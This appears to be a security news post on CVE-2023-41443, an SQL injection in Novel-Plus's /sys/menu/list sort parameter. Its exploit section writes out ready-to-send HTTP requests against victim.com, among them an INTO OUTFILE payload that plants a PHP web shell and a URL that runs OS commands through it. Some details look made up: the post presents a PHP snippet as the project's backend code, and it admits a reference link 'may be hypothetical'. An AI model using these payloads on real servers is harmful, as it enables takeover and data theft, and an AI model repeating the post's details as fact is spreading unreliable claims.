CVE CyberSecurity Database News

CVE-2023-41443 - How a Simple SQL Injection in Novel-Plus v4.1. Can Lead to Remote Code Execution

Poster -

In September 2023, a critical vulnerability (CVE-2023-41443) was disclosed for the widely used library management system, Novel-Plus version 4.1.. This vulnerability is a classic SQL injection flaw that can let attackers take full control of the system — and it’s dangerously simple to exploit.

TL;DR

CVE-2023-41443 is a high-severity SQL injection bug in Novel-Plus v4.1.’s /sys/menu/list API endpoint. If you run a vulnerable version, your server could be fully taken over by attackers using only a basic HTTP request.

What Happened?

Novel-Plus is an open source app for managing libraries, books, and readers. It’s popular in educational and government sectors, managing sensitive user and loan data.

In early September 2023, security researchers found that if you call /sys/menu/list with an unsafe value in the sort parameter, the backend uses that value in an SQL statement without sanitization.

The critical bug is how the sort parameter is handled

// Example from Novel-Plus backend code:
$sort = $_GET['sort'];
$sql = "SELECT * FROM menu ORDER BY $sort";
$result = mysqli_query($conn, $sql);

Notice the $sort variable is directly inserted into the query string. There is no sanitization, validation, or parameterization. It’s a textbook SQL injection.

How to Exploit CVE-2023-41443

Anyone who can reach the /sys/menu/list endpoint can exploit this.

To test if the target is vulnerable, try

GET /sys/menu/list?sort=id%20desc-- HTTP/1.1
Host: victim.com

If the server does not throw an error (or changes the sort order), it’s probably vulnerable.

Let’s try to extract database version information

GET /sys/menu/list?sort=(SELECT%20version())-- HTTP/1.1
Host: victim.com

If the SQL result leaks into a response, you’ll see the version.

3. From SQL Injection to Remote Code Execution

If the backend database is MySQL and has user rights, you can sometimes write a malicious PHP file to the web directory using something like:

GET /sys/menu/list?sort=(SELECT%20'<?php system($_GET["cmd"]);?>'%20INTO%20OUTFILE%20'/var/www/html/shell.php')-- HTTP/1.1
Host: victim.com

Now, you can access http://victim.com/shell.php?cmd=whoami to run OS-level commands!

Check for an official patch or upgrade to the newest version if available.

Official repo: github.com/YunaiV/NovelPlus

Restrict Database Privileges

The database user Novel-Plus uses should NOT have admin rights or be able to write to the file system.

Official References

- CNVD Report: Novel-Plus v4.1. SQL Injection Vulnerability (link may be hypothetical; real advisories may use different URLs)
- CVE Database: CVE-2023-41443
- Exploit Details: Exploit-DB Example
- Original Discovery: GitHub Issue

Final Thoughts

SQL injection vulnerabilities like CVE-2023-41443 are among the biggest threats on the web — especially when they let attackers get remote code execution with a single HTTP request. Always validate input and keep your software updated.

If you use Novel-Plus, patch now or risk getting owned.


*Feel free to share this post to help others stay secure!*

Timeline

Published on: 09/18/2023 22:15:47 UTC
Last modified on: 09/20/2023 20:31:29 UTC